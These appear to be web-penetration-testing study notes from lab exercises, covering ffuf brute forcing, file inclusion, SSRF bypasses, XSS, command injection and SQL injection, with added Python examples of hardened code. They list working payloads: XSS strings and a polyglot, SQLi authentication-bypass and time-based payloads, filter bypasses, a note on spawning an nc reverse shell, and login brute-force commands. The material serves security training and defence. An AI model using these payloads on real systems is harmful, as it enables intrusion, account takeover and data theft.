Content Discovery
OSINT
Filter | Description |
---|---|
site: | only results from the specified website address |
inurl: | results with the specified word in the URL |
filetype: | results with a particular file extension |
intitle: | results that contain the word in the title |
Wappalyzer
- helps identify what technologies a website uses
- frameworks
- cms
- payment processors
- …
Automated Discovery
Wordlists
ffuf
ffuf -w <path to wordlist> -u <target site>
dirb
dirb <target site> <path to wordlist>
Gobuster
gobuster dir --url <target site> -w <path to wordlist>
Subdomain Enumeration
SSL/TLS Certificates
DNS Bruteforce
dnsrecon -t <type of scan> -d <target domain> -D <path to hostnames>
https://github.com/darkoperator/dnsrecon
Sublist3r
./sublist3r.py -d <target domain>
https://github.com/aboul3la/Sublist3r
Virtual Hosts - ffuf
ffuf -w <path to wordlist> -H "Host: FUZZ.<target domain (host header)>" -u https://<machine ip>
Authentication Bypass
Username Enumeration
ffuf
try a list of words against the form, matching responses that contain the text given to -mr
ffuf -w <path to wordlist> \
-X POST \
-d "username=FUZZ&email=x&password=x&cpassword=x" \
-H "Content-Type: application/x-www-form-urlencoded" \
-u <target url with path to form> -mr "username already exists"
Brute Force
ffuf -w <path to wordlist with found usernames>:W1,<path to password wordlist>:W2 \
-X POST -d "username=W1&password=W2" \
-H "Content-Type: application/x-www-form-urlencoded" \
-u <target url with path to form> -fc 200
Cookie Tampering
IDOR - Insecure Direct Object Reference
File Inclusion
Path Traversal
trying to climb out of the web application's directory using the dot-dot-slash (../) sequence, known as a path traversal attack
Local File Inclusion
- no directory specified inside the function:
  <?php include($_GET["lang"]); ?>
  - lang can be replaced with a direct (absolute) path to a file
- directory specified inside the function:
  <?php include("languages/" . $_GET['lang']); ?>
  - need to use a relative path (../) to reach files outside that directory
Bypassing Filters in Include Function
- getting around specified file endings
  - use %00 (NULL BYTE) to terminate the string - fixed in PHP 5.3.4
- avoiding filtered keywords
  - use /. at the end of the filtered keyword
- bypassing input validation
  - getting around ../ being replaced with an empty string - use ....// instead: PHP removes the inner ../ (replaces it with an empty string) and the surrounding ../ stays
- reading outside of a defined directory
  - include the directory in the payload
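As an added example (not from the notes or from PHP itself), the ....// bypass and the direct-path case above reproduced in Python against the kind of include("languages/" . $lang) call shown earlier, next to two hardened checks. BASE_DIR and the language allow-list are constructed for the example.

```python
import posixpath

BASE_DIR = "/var/www/app/languages"   # hypothetical include directory
ALLOWED_LANGS = {"en", "fr", "de"}     # constructed allow-list for the example

def naive_filter(lang: str) -> str:
    """The filter from the notes: strips ../ once. Stripping is not
    idempotent, so ....// collapses to ../ and still climbs out."""
    return lang.replace("../", "")

def naive_include_path(lang: str) -> str:
    """Path the vulnerable include("languages/" . $lang) would open."""
    return posixpath.normpath(BASE_DIR + "/" + naive_filter(lang))

def safe_include_path(lang: str) -> str:
    """Hardened: normalise first, then require the result to stay under
    BASE_DIR; anything else is rejected rather than 'cleaned' up."""
    if "\x00" in lang:            # the %00 trick: null bytes never belong here
        raise ValueError("null byte in parameter")
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, lang))
    # join() discards BASE_DIR when lang is absolute, so the check below
    # also catches a direct path such as /etc/passwd
    if posixpath.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise ValueError(f"traversal rejected: {lang!r}")
    return candidate   # on disk, also compare os.path.realpath() to defeat symlinks

def allowlisted_include_path(lang: str) -> str:
    """Simplest fix: the app only has a few languages, so accept only those."""
    if lang not in ALLOWED_LANGS:
        raise ValueError(f"unknown language: {lang!r}")
    return posixpath.join(BASE_DIR, lang + ".php")

def rejects(fn, value: str) -> bool:
    """True if fn raises ValueError for value (used by the checks below)."""
    try:
        fn(value)
    except ValueError:
        return True
    return False
```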
Remote File Inclusion
Calling a file from a remote server so that it is included in the web app, which then executes the PHP code it contains.
SSRF
Finding SSRF
- full url used as parameter in address bar
- hidden field in a form
- partial url like a hostname
- path of a url
Use https://requestbin.com to catch HTTP requests from a server
Defeating Common SSRF Defenses
- Deny List
  - using alternative localhost references
  - or a subdomain that has a DNS record resolving to the IP 127.0.0.1, such as 127.0.0.1.nip.io
- Allow List
  - creating a subdomain on the attacker's domain name
  - e.g. website.thm -> website.thm.attack.thm
- Open Redirect
  - an endpoint on the server that redirects the service to another location
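A defender-side illustration of why the deny-list and allow-list checks above fail, as an added example that is not from the original notes: the weak checks next to a hardened one. The domain names, the offline DNS table and the allow-list are constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed DNS table so the example runs offline. A real check would call
# socket.getaddrinfo() and then connect to the *resolved* address rather than
# the hostname, so a second lookup cannot hand back a different answer.
FAKE_DNS = {
    "website.thm": ["93.184.216.34"],             # the allow-listed service
    "website.thm.attack.thm": ["93.184.216.99"],  # attacker-controlled subdomain
    "127.0.0.1.nip.io": ["127.0.0.1"],            # public name, loopback answer
}
ALLOWED_HOSTS = {"website.thm"}                   # hypothetical allow-list
DENIED_HOSTS = {"localhost", "127.0.0.1"}         # hypothetical deny-list

def weak_denylist_allows(url: str) -> bool:
    """Flawed deny list: compares the hostname text only, so any other name
    that resolves to 127.0.0.1 (127.0.0.1.nip.io, 127.1, ...) gets through."""
    return urlsplit(url).hostname not in DENIED_HOSTS

def weak_allowlist_allows(url: str) -> bool:
    """Flawed allow list: a prefix match, so website.thm.attack.thm passes."""
    return any(url.startswith(f"http://{h}") or url.startswith(f"https://{h}")
               for h in ALLOWED_HOSTS)

def strict_allows(url: str, resolve=lambda h: FAKE_DNS.get(h, [])) -> bool:
    """Hardened: exact hostname match against the allow list, then every
    resolved address must be globally routable, which rejects loopback,
    RFC 1918, link-local and similar internal ranges."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or parts.hostname is None:
        return False
    host = parts.hostname.rstrip(".")   # .hostname is already lower-cased
    if host not in ALLOWED_HOSTS:
        return False
    addrs = resolve(host)
    return bool(addrs) and all(ipaddress.ip_address(a).is_global for a in addrs)
```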
Cross-site Scripting
Reflected XSS
Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation.
- testing for reflected xss
  - parameters in the url query string
  - url file path
  - sometimes http headers (unlikely to be exploitable)
Stored XSS
As the name infers, the XSS payload is stored on the web application (in a database, for example) and then gets run when other users visit the site or web page.
- testing for stored xss
  - every possible point of entry where data seems to be stored and then shown back to other users
    - comments on a blog
    - user profile information
    - website listings
DOM (Document Object Model) Based XSS
DOM Based XSS is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code. Execution occurs when the website JavaScript code acts on input or user interaction.
- testing for DOM based xss
  - look for uses of window.location.x and eval() in the JS
Blind XSS
Blind XSS is similar to a stored XSS in that your payload gets stored on the website for another user to view, but in this instance, you can’t see the payload working or be able to test it against yourself first.
- testing for blind xss
  - XSS Hunter Express https://github.com/mandatoryprogrammer/xsshunter-express
  - need to make sure the payload has a callback so you can see whether it worked
“Perfecting Your Payload”
- simple heading output field: <script>alert('THM');</script>
- value in an input field: "><script>alert('THM');</script>
  - closes the value attribute and the input tag
- input in a textarea: </textarea><script>alert('THM');</script>
  - closes the textarea and adds a script
- input reflected in JS code: ';alert('THM');//
  - escapes the existing JS statement: the ' closes the string assigned to the variable, ; ends the current statement, and // turns the code after it into a comment
- filter that removes "script" from the input: <sscriptcript>alert('THM');</sscriptcript>
  - "script" gets removed, but the surrounding s cript stays and forms a new script tag
- image tag as input: /images/cat.jpg" onload="alert('THM');
- polyglot / xss polyglot:
  jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror = alert('THM'))//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
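Added example, not from the notes: the output contexts from the payload list above (heading, input value, textarea, JS string, image URL) rendered with context-appropriate escaping in Python, next to the single-pass "remove script" filter that the <sscriptcript> payload defeats. The templates and the fallback image path are constructed for the example.

```python
import html
import json

def naive_strip_filter(value: str) -> str:
    """The blocklist filter from the notes: removes the word 'script' once.
    Removal is not idempotent, so the leftover text re-forms the tag."""
    return value.replace("script", "")

def render_heading(value: str) -> str:
    # HTML body context: < > & (and quotes) become entities
    return f"<h1>{html.escape(value)}</h1>"

def render_input(value: str) -> str:
    # Attribute context: quote=True also turns " and ' into entities,
    # so the "> breakout cannot close the value attribute
    return f'<input name="q" value="{html.escape(value, quote=True)}">'

def render_textarea(value: str) -> str:
    # RCDATA context: an escaped </textarea> cannot end the element
    return f"<textarea>{html.escape(value)}</textarea>"

def render_js_string(value: str) -> str:
    # JS string context: json.dumps quotes and escapes the value, then
    # < > & are written as \uXXXX so </script> cannot end the block
    literal = (json.dumps(value).replace("<", "\\u003c")
               .replace(">", "\\u003e").replace("&", "\\u0026"))
    return f"<script>var name = {literal};</script>"

def render_image(value: str) -> str:
    # URL attribute: reject javascript: and other schemes up front (the
    # polyglot starts with jaVasCript:), then escape like any attribute
    lowered = value.strip().lower()
    ok = ((lowered.startswith("/") and not lowered.startswith("//"))
          or lowered.startswith("http://") or lowered.startswith("https://"))
    if not ok:
        value = "/images/default.jpg"   # constructed fallback for the example
    return f'<img src="{html.escape(value, quote=True)}">'
```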
Command Injection - Remote Code Execution
Exploiting Command Injection
- types of command injection
  - blind
    - This type of injection is where there is no direct output from the application when testing payloads. You will have to investigate the behaviours of the application to determine whether or not your payload was successful.
  - verbose
    - This type of injection is where there is direct feedback from the application once you have tested a payload. For example, running the whoami command to see what user the application is running under. The web application will output the username on the page directly.
Detecting Blind Command Injection
- no output visible
- need to use payloads that will cause some delay, such as ping or sleep
- or force some output
  - redirection operators like >
  - curl is a good way to test: it delivers data to and from the application in the payload
Detecting Verbose Command Injection
- application gives direct feedback on output
Useful payloads
Linux
Payload | Description |
---|---|
whoami | See what user the application is running under. |
ls | List the contents of the current directory. You may find configuration files, environment files (tokens and application keys) and other valuable data. |
ping | Causes the application to hang while the pings run; useful when testing for blind command injection. |
sleep | Another delay payload for testing blind command injection, for machines where ping is not installed. |
nc | Netcat can be used to spawn a reverse shell from the vulnerable application, giving a foothold to look for other services, files or means of escalating privileges on the target. |
Windows
Payload | Description |
---|---|
whoami | See what user the application is running under. |
dir | List the contents of the current directory. You may find configuration files, environment files (tokens and application keys) and other valuable data. |
ping | Causes the application to hang while the pings run; useful when testing for blind command injection. |
timeout | Also causes the application to hang; useful for testing blind command injection where the ping command is not installed. |
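As an added example (not from the notes): the injectable way of building the ping command from the tables above next to a hardened version, plus a small access-log check for the command separators that the blind payloads (sleep, ping, whoami, >) need. The handler, hostname grammar and log lines are constructed for this example.

```python
import re
import subprocess
from urllib.parse import unquote_plus

# Hostname grammar (RFC 1123 labels); nothing else reaches the command.
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
# Shell metacharacters that turn one argument into a second command.
META_RE = re.compile(r"[;&|`\n<>]|\$\(")

def vulnerable_command(host: str) -> str:
    """How an injectable handler builds its command: one string handed to a
    shell, so '10.0.0.5; sleep 5' runs ping and then sleep."""
    return "ping -c 1 " + host      # os.system()/shell=True in the real app

def safe_argv(host: str) -> list:
    """Hardened: validate the value as a hostname, then pass argv as a list.
    Without a shell there is nothing to interpret ; | ` or $( )."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return ["ping", "-c", "1", host]

def run_safe(host: str) -> int:
    """Runs the validated command with a timeout; returns ping's exit code."""
    return subprocess.run(safe_argv(host), capture_output=True,
                          timeout=10).returncode

def suspicious_params(query: str) -> dict:
    """Detection helper for access logs: decode each parameter and report the
    ones containing command separators (the blind payloads need one)."""
    hits = {}
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if META_RE.search(value):
            hits[key] = value
    return hits

# Constructed log entries for the example (not from a real system)
SAMPLE_LOG = [
    "GET /ping?ip=10.0.0.5 HTTP/1.1",
    "GET /ping?ip=10.0.0.5%3B+sleep+5 HTTP/1.1",
    "GET /ping?ip=10.0.0.5+%7C+whoami+%3E+out.txt HTTP/1.1",
]

def scan_log(lines) -> list:
    """Returns the request lines whose query carries a suspicious parameter."""
    flagged = []
    for line in lines:
        path = line.split(" ")[1]
        _, _, query = path.partition("?")
        if suspicious_params(query):
            flagged.append(line)
    return flagged
```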
Cheat Sheet
https://github.com/payloadbox/command-injection-payload-list
SQL Injection
In Band SQLi
the same communication channel is used to exploit the vulnerability and to receive the results
- error based
  - most useful for easily obtaining information about the database structure
- union based
  - uses the SQL UNION operator alongside SELECT to return additional results - used to extract large amounts of data
Blind SQLi - Authentication Bypass
error messages have been disabled, but the injection still works
- example
  - using a query that always returns true: OR 1=1;--
Blind SQLi - Boolean Based
injection with only two possible responses
- example: username choice
  - extending the query with conditions such as ... column_name LIKE '%'
  - trying all possible combinations, e.g. a%, b%, …
Blind SQLi - Time Based
same as boolean based, except there is no feedback on whether the query is good; only the response time is available as a measurement
- example
  - admin123' UNION SELECT SLEEP(5);--
    - no pause = unsuccessful (wrong column count)
  - admin123' UNION SELECT SLEEP(5),2;--
    - pause = successful
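Added example, not from the original notes: the authentication-bypass and UNION payloads above run against a string-built query and against a parameterised one, using Python's sqlite3 with a constructed in-memory user table.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table for the example (not real data).
    Passwords are stored in clear only to keep the demo short; a real app
    stores a salted hash and compares in code."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret-admin-pw"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, username: str, password: str):
    """String-built query: the input is parsed as SQL. A password of
    x' OR 1=1;-- comments out the real check and matches every row, and a
    username carrying UNION SELECT returns whatever the injected query yields."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username: str, password: str):
    """Parameterised query: ? placeholders are bound as data, so the same
    payloads are just strings that match no row. This also removes the
    error-, boolean- and time-based variants, since no input is ever parsed."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None
```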
Out Of Band SQLi
An Out-Of-Band attack is classified by having two different communication channels, one to launch the attack and the other to gather the results. For example, the attack channel could be a web request, and the data gathering channel could be monitoring HTTP/DNS requests made to a service you control.